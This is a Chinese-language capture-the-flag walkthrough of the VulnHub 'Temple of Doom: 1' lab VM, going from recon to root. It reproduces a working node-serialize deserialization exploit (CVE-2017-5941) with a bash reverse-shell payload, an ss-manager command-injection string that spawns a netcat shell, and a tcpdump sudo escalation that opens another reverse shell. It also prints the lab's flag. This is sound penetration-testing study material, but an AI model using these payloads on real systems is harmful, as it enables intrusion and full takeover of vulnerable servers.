Temple of Doom 1
靶机基本信息
作者:jason_huawen
名称:Temple of Doom: 1
地址:
https://www.vulnhub.com/entry/temple-of-doom-1,243/
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Temple]
└─$ sudo netdiscover -i eth1
Currently scanning: 172.26.218.0/16 | Screen View: Unique Hosts
4 Captured ARP Req/Rep packets, from 3 hosts. Total size: 240
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:0a 1 60 Unknown vendor
192.168.56.100 08:00:27:3e:7d:ac 2 120 PCS Systemtechnik GmbH
192.168.56.228 08:00:27:66:97:ec 1 60 PCS Systemtechnik GmbH
利用Kali Linux自带的netdiscover工具识别目标主机的IP地址为192.168.56.228
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.228 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-11 08:46 EST
Nmap scan report for bogon (192.168.56.228)
Host is up (0.000066s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey:
| 2048 95:68:04:c7:42:03:04:cd:00:4e:36:7e:cd:4f:66:ea (RSA)
| 256 c3:06:5f:7f:17:b6:cb:bc:79:6b:46:46:cc:11:3a:7d (ECDSA)
|_ 256 63:0c:28:88:25:d5:48:19:82:bb:bd:72:c6:6c:68:50 (ED25519)
666/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
MAC Address: 08:00:27:66:97:EC (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.10 seconds
NMAP扫描结果表明目标主机有2个开放端口。
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ curl http://192.168.56.228:666/
Under Construction, Come Back Later!
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ curl http://192.168.56.228:666/robots.txt
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>Error</title>
</head>
<body>
<pre>Cannot GET /robots.txt</pre>
</body>
</html>
──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ gobuster dir -u http://192.168.56.228:666 -w /usr/share/wordlists/dirbuster/directory-list-1.0.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.56.228:666
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-1.0.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2022/12/11 08:58:08 Starting gobuster in directory enumeration mode
===============================================================
Progress: 139440 / 141709 (98.40%)===============================================================
2022/12/11 08:58:27 Finished
===============================================================
录扫描没有任何收获。用burpsuite拦截请求,访问http://192.168.56.228:666,此次返回:
利用Gobsuter工具进行目录扫描没有任何收获。用burpsuite拦截请求,访问http://192.168.56.228:666,此次返回:
SyntaxError: Unexpected token F in JSON at position 79
at JSON.parse (<anonymous>)
at Object.exports.unserialize (/home/nodeadmin/.web/node_modules/node-serialize/lib/serialize.js:62:16)
at /home/nodeadmin/.web/server.js:12:29
at Layer.handle [as handle_request] (/home/nodeadmin/.web/node_modules/express/lib/router/layer.js:95:5)
at next (/home/nodeadmin/.web/node_modules/express/lib/router/route.js:137:13)
at Route.dispatch (/home/nodeadmin/.web/node_modules/express/lib/router/route.js:112:3)
at Layer.handle [as handle_request] (/home/nodeadmin/.web/node_modules/express/lib/router/layer.js:95:5)
at /home/nodeadmin/.web/node_modules/express/lib/router/index.js:281:22
at Function.process_params (/home/nodeadmin/.web/node_modules/express/lib/router/index.js:335:12)
at next (/home/nodeadmin/.web/node_modules/express/lib/router/index.js:275:10)
在浏览器开发者工具看到多了个cookie:
profile=eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcz0iOkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0%3D
profile的值先url decode解码,然后base64解码:(可利用cyberchef)
解码结果为:
{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires=":Friday, 13 Oct 2018 00:00:00 GMT"}
仔细观察解码后的字符串,发现这个Expire=格式不对,需要去掉=,然后重新编码(base64编码,然后url编码)
然后更新cookie的profile值,刷新页面
即:
{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires":"Friday, 13 Oct 2018 00:00:00 GMT"}
eyJ1c2VybmFtZSI6IkFkbWluIiwiY3NyZnRva2VuIjoidTMydDRvM3RiM2dnNDMxZnMzNGdnZGdjaGp3bnphMGw9IiwiRXhwaXJlcyI6IkZyaWRheSwgMTMgT2N0IDIwMTggMDA6MDA6MDAgR01UIn0=
刷新页面,此时返回结果的页面显示“hello Admin"
然后利用CVE-2017-5941(Node.js反序列化)getshell, 漏洞利用代码地址:
https://www.exploit-db.com/exploits/49552
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ mv ~/Downloads/49552.py .
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ mv 49552.py exploit.py
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ ls
exploit.py nmap_full_scan
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ cat exploit.py
# Exploit Title: Node.JS - 'node-serialize' Remote Code Execution (2)
# Exploit Author: UndeadLarva
# Software Link: https://www.npmjs.com/package/node-serialize
# Version: 0.0.4
# CVE: CVE-2017-5941
import requests
import re
import base64
import sys
url = 'http://192.168.56.228:666/' # change this
payload = ("require('http').ServerResponse.prototype.end = (function (end) {"
"return function () {"
"['close', 'connect', 'data', 'drain', 'end', 'error', 'lookup', 'timeout', ''].forEach(this.socket.removeAllListeners.bind(this.socket));"
"console.log('still inside');"
"const { exec } = require('child_process');"
"exec('bash -i >& /dev/tcp/192.168.56.206/445 0>&1');" # change this
"}"
"})(require('http').ServerResponse.prototype.end)")
# rce = "_$$ND_FUNC$$_process.exit(0)"
# code ="_$$ND_FUNC$$_console.log('behind you')"
code = "_$$ND_FUNC$$_" + payload
string = '{"username":"Admin","csrftoken":"u32t4o3tb3gg431fs34ggdgchjwnza0l=","Expires":"Friday, 13 Oct 2018 00:00:00 GMT", "exec": "'+code+'"}'
cookie = {'profile':base64.b64encode(string)}
try:
response = requests.get(url, cookies=cookie).text
print response
except requests.exceptions.RequestException as e:
print('Oops!')
sys.exit(1)
对下载的exploit进行一定的修改,除了代码中明确的change this, string处需要修改cookie,也就是前面刷新cookie值得到反馈hello admin
在Kali Linux成功得到了shell:
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ sudo nc -nlvp 445
[sudo] password for kali:
listening on [any] 445 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.228] 37182
bash: cannot set terminal process group (844): Inappropriate ioctl for device
bash: no job control in this shell
[nodeadmin@localhost ~]$ id
id
uid=1001(nodeadmin) gid=1001(nodeadmin) groups=1001(nodeadmin)
[nodeadmin@localhost ~]$ cd /tmp
cd /tmp
提权
将Linpeas.sh脚本脚本上传至目标主机/tmp目录,修改权限,并执行脚本:
在输出结果中发现了一个进程:
root 838 0.0 0.1 301464 4524 ? S 08:15 0:00 su fireman -c /usr/local/bin/ss-manager
关于ss-manager的漏洞:
https://www.exploit-db.com/exploits/43006
提权过程如下(提权为另一个用户),在kali linux上输入:
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ sudo nc -nlvp 3333
[sudo] password for kali:
listening on [any] 3333 ...
在目标主机(就是前面得到的反弹shell)输入:
[nodeadmin@localhost home]$ nc -u 127.0.0.1 8839
然后接着输入:
add: {"server_port":8003, "password":"test", "method":"||nc 192.168.56.206 3333 -e /bin/bash||"}
这样在Kali Linux上获得了另一个shell,这个shell的用户为fireman
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ sudo nc -nlvp 3333
[sudo] password for kali:
listening on [any] 3333 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.228] 45432
id
uid=1002(fireman) gid=1002(fireman) groups=1002(fireman)
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
[fireman@localhost root]$
[fireman@localhost root]$ sudo -l
sudo -l
Matching Defaults entries for fireman on localhost:
!visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fireman may run the following commands on localhost:
(ALL) NOPASSWD: /sbin/iptables
(ALL) NOPASSWD: /usr/bin/nmcli
(ALL) NOPASSWD: /usr/sbin/tcpdump
[fireman@localhost root]$
可以利用tcpdump进行提权,参考GTFOBINS网站的提权方法:
此时id需要更换为反弹shell命令
which python
/usr/bin/python
python -c 'import pty;pty.spawn("/bin/bash")'
[fireman@localhost root]$ sudo -l
sudo -l
Matching Defaults entries for fireman on localhost:
!visiblepw, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR
LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS
LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT
LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER
LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
XAUTHORITY",
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User fireman may run the following commands on localhost:
(ALL) NOPASSWD: /sbin/iptables
(ALL) NOPASSWD: /usr/bin/nmcli
(ALL) NOPASSWD: /usr/sbin/tcpdump
[fireman@localhost root]$ COMMAND='/bin/bash -i >& /dev/tcp/192.168.56.206/8888 0>&1'
<'/bin/bash -i >& /dev/tcp/192.168.56.206/8888 0>&1'
[fireman@localhost root]$ TF=$(mktemp)
TF=$(mktemp)
[fireman@localhost root]$ echo "$COMMAND" > $TF
echo "$COMMAND" > $TF
[fireman@localhost root]$ chmod +x $TF
chmod +x $TF
[fireman@localhost root]$ sudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
<ump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root
tcpdump: listening on lo, link-type EN10MB (Ethernet), capture size 262144 bytes
^C
输入完上述命令之后,还需要输入Ctrl+C退出,退出之后才能得到root的反弹shell
┌──(kali㉿kali)-[~/Vulnhub/Temple]
└─$ sudo nc -nlvp 8888
[sudo] password for kali:
listening on [any] 8888 ...
connect to [192.168.56.206] from (UNKNOWN) [192.168.56.228] 40482
bash: cannot set terminal process group (20398): Inappropriate ioctl for device
bash: no job control in this shell
[root@localhost ~]# id
id
uid=0(root) gid=0(root) groups=0(root)
[root@localhost ~]# cd /root
cd /root
[root@localhost ~]# ls -alh
ls -alh
total 84K
dr-xr-x---. 10 root root 4.0K Jun 7 2018 .
dr-xr-xr-x. 18 root root 4.0K May 30 2018 ..
-rw------- 1 root root 130 Jun 7 2018 .bash_history
-rw-r--r--. 1 root root 18 Feb 9 2018 .bash_logout
-rw-r--r--. 1 root root 176 Feb 9 2018 .bash_profile
-rw-r--r--. 1 root root 176 Feb 9 2018 .bashrc
drwx------. 3 root root 4.0K Jun 1 2018 .cache
drwxrwx---. 4 root root 4.0K May 30 2018 .config
-rw-r--r--. 1 root root 100 Feb 9 2018 .cshrc
drwx------. 3 root root 4.0K May 30 2018 .dbus
-rw-------. 1 root root 16 May 30 2018 .esd_auth
-rw-r--r-- 1 root root 2.0K Jun 7 2018 flag.txt
-rw-r--r-- 1 root root 12K Jun 3 2018 .flag.txt.swp
drwxr-xr-x 4 root root 4.0K Jun 3 2018 .forever
-rw------- 1 root root 1.4K Jun 2 2018 .mysql_history
drwxr-xr-x. 5 1000 1000 4.0K May 30 2018 .npm
drwxr-----. 3 root root 4.0K May 30 2018 .pki
drwxr-xr-x 2 root root 4.0K Jun 1 2018 .ssocks
drwx------ 2 root root 4.0K Jun 7 2018 .ssh
-rw-------. 1 root root 0 May 30 2018 .Xauthority
[root@localhost ~]# cat flag.txt
cat flag.txt
[+] You're a soldier.
[+] One of the best that the world could set against
[+] the demonic invasion.
+-----------------------------------------------------------------------------+
| | |\ -~ / \ / |
|~~__ | \ | \/ /\ /|
| -- | \ | / \ / \ / |
| |~_| \ \___|/ \/ / |
|--__ | -- |\________________________________/~~\~~| / \ / \ |
| |~~--__ |~_|____|____|____|____|____|____|/ / \/|\ / \/ \/|
| | |~--_|__|____|____|____|____|____|_/ /| |/ \ / \ / |
|___|______|__|_||____|____|____|____|____|__[]/_|----| \/ \ / |
| \mmmm : | _|___|____|____|____|____|____|___| /\| / \ / \ |
| B :_--~~ |_|____|____|____|____|____|____| | |\/ \ / \ |
| __--P : | / / / | \ / \ /\|
|~~ | : | / ~~~ | \ / \ / |
| | |/ .-. | /\ \ / |
| | / | | |/ \ /\ |
| | / | | -_ \ / \ |
+-----------------------------------------------------------------------------+
| | /| | | 2 3 4 | /~~~~~\ | /| |_| .... ......... |
| | ~|~ | % | | | ~J~ | | ~|~ % |_| .... ......... |
| AMMO | HEALTH | 5 6 7 | \===/ | ARMOR |#| .... ......... |
+-----------------------------------------------------------------------------+
FLAG: kre0cu4jl4rzjicpo1i7z5l1
[+] Congratulations on completing this VM & I hope you enjoyed my first boot2root.
[+] You can follow me on twitter: @0katz
[+] Thanks to the homie: @Pink_P4nther
[root@localhost ~]#
成功得到了root flag.
经验教训
- 需要仔细观察漏洞利用代码,可能代码本身给出的修改指南是不足以完成漏洞利用的,比如此次测试过程中所利用到的nodejs 反序列化漏洞利用代码。